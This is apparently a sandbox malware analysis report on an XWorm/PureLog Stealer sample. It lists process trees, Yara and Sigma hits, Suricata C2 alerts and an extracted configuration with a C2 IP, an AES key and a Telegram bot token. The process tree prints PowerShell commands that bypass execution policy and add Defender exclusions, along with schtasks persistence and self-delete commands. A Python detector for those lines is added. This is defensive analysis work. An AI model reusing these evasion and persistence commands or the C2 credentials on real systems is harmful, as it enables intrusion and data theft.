
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1569488
MD5: 7823e902900881094372948957825fe1
SHA1: 297a663f3b64fb9863164d10ac698bef03dd3a0f
SHA256: 92d36e5fb3fdbf10ad10c7880c40013c2e21b8a49e20720137d2b4851681233f
Tags: exe, user-Bitsight

Detection

PureLog Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7823E902900881094372948957825FE1)
    • file.exe (PID: 2852 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7823E902900881094372948957825FE1)
      • powershell.exe (PID: 5928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3796 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WindowsUpdaterConf.exe (PID: 6184 cmdline: "C:\Users\user\WindowsUpdaterConf.exe" MD5: 7823E902900881094372948957825FE1)
          • WerFault.exe (PID: 6380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3796 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6184 -ip 6184 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 5640 cmdline: "cmd" /c timeout /t 1 && DEL /f file.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5940 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • file.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Roaming\file.exe" MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • file.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Roaming\file.exe" MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 1860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 5960 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 5184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 1204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 4040 cmdline: "C:\Users\user\WindowsUpdaterConf.exe" MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 3468 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1164 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 5688 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1148 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 6024 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 1132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 2756 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
  • cleanup
{"C2 url": ["185.196.8.239"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk", "Telegram Chatid": "1818813749", "Version": "XWorm V5.6"}
Yara Overview: Initial Sample

Source | Rule | Description | Author
file.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara Overview: PCAP (Network Traffic)

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Yara Overview: Dropped Files

Source | Rule | Description | Author
C:\Users\user\WindowsUpdaterConf.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Users\user\AppData\Roaming\file.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara Overview: Memory Dumps

Source | Rule | Description | Author
00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(10 further entries not shown in this view)

Yara Overview: Unpacked PEs

Source | Rule | Description | Author
0.2.file.exe.3719ccc.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.file.exe.3719ccc.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.file.exe.3719ccc.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xe5b5:$s6: VirtualBox
  • 0xe513:$s8: Win32_ComputerSystem
  • 0x10ee4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10f81:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11096:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xfe2d:$cnc4: POST / HTTP/1.1
0.2.file.exe.372e50c.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.file.exe.372e50c.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(17 further entries not shown in this view)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\file.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\666999666
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2852, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
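The four PowerShell exclusion commands, the once-a-minute elevated schtasks job and the cmd.exe self-delete in the process tree are the command lines the Sigma events above fire on. The following is an added example, not code from the Joe Sandbox report, from the sample or from the Sigma project: it runs the report's own command lines (plus two assumed benign lines) through a small rule set and also pulls out the excluded paths and process names, which are exactly the values Remove-MpPreference needs during cleanup. The -ep and -ex abbreviations in the bypass rule are PowerShell's partial-parameter forms and are assumed variants, not something this report shows.

```python
"""Flag the defence-evasion and persistence command lines recorded in this
report. Added example: not code from the report, the sandbox or the sample."""
import re
from dataclasses import dataclass

# Constructed sample input: the command lines from the process tree above,
# followed by two benign lines (assumed, not from the report) that must not match.
SAMPLE_CMDLINES = [
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'""",
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"',
    r'"cmd" /c timeout /t 1 && DEL /f file.exe',
    r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r'"C:\Windows\System32\schtasks.exe" /query /tn "Backup"',
]


@dataclass(frozen=True)
class Finding:
    rule: str
    cmdline: str


# A rule fires only when every pattern in its list matches the command line.
RULES = {
    "defender_exclusion_via_powershell": [
        re.compile(r"powershell(\.exe)?", re.I),
        re.compile(r"add-mppreference\s+-exclusion(path|process|extension|ipaddress)\b", re.I),
    ],
    "execution_policy_bypass": [
        re.compile(r"powershell(\.exe)?", re.I),
        # -ep / -ex are PowerShell partial-parameter abbreviations (assumed
        # variants; this report only shows the full -ExecutionPolicy form).
        re.compile(r"-(executionpolicy|ex|ep)\s+bypass\b", re.I),
    ],
    "schtasks_every_minute_highest_rl": [
        re.compile(r"schtasks(\.exe)?\b", re.I),
        re.compile(r"/create\b", re.I),
        re.compile(r"/sc\s+minute\b", re.I),
        re.compile(r"/rl\s+highest\b", re.I),
    ],
    "cmd_timeout_self_delete": [
        re.compile(r"\bcmd(\.exe)?\b", re.I),
        re.compile(r"timeout\s+/t\s+\d+\s*&&\s*del\s+/f\b", re.I),
    ],
}


def scan(cmdlines):
    """Return a Finding for every (rule, command line) pair where the rule fires."""
    return [
        Finding(name, line)
        for line in cmdlines
        for name, patterns in RULES.items()
        if all(p.search(line) for p in patterns)
    ]


# The excluded value may be single-quoted, double-quoted, or a bare token.
_EXCLUSION = re.compile(
    r"-(Exclusion(?:Path|Process|Extension))\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)


def exclusion_targets(cmdlines):
    """Collect what Add-MpPreference excluded, keyed by lower-cased parameter
    name, so the same values can be handed to Remove-MpPreference."""
    targets = {}
    for line in cmdlines:
        for param, single, double, bare in _EXCLUSION.findall(line):
            targets.setdefault(param.lower(), []).append(single or double or bare)
    return targets


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.rule}] {f.cmdline}")
    print(exclusion_targets(SAMPLE_CMDLINES))
```

Each PowerShell line trips two rules (exclusion and policy bypass), which matches the two Sigma hits per process above; the benign conhost and schtasks /query lines produce nothing. Feeding the output of exclusion_targets to Remove-MpPreference -ExclusionPath / -ExclusionProcess reverses the Defender tampering without guessing at what was excluded.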
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:40:35.861908+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 149.154.167.220 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:40:49.279298+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:01.792137+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:06.078519+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:14.306493+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:26.820479+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:36.074500+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:39.346854+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:44.039426+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:44.186711+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:44.354657+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:49.930287+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:50.493925+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:50.604514+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:56.183674+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:56.328908+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:56.498022+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:06.073461+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:08.885531+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:12.117835+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:22.726539+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:22.868735+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:23.040475+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:23.183664+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:26.601407+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:28.023630+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:33.680034+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:36.096593+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:38.227034+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:38.418978+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:43.696326+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:43.888449+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:46.372475+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:58.883827+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:04.245042+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:04.437499+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:05.040102+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:06.096583+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.274398+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.415537+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.594513+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.834543+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:22.322408+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:24.696129+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:29.688528+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:29.881428+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:36.090598+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:40.196613+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:41.339455+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:42.024594+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:54.541105+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:56.823146+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:57.103007+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:44:06.093314+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:44:08.658761+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:40:49.322470+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:01.794410+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:14.308474+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:26.822739+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:39.348559+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:44.042422+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
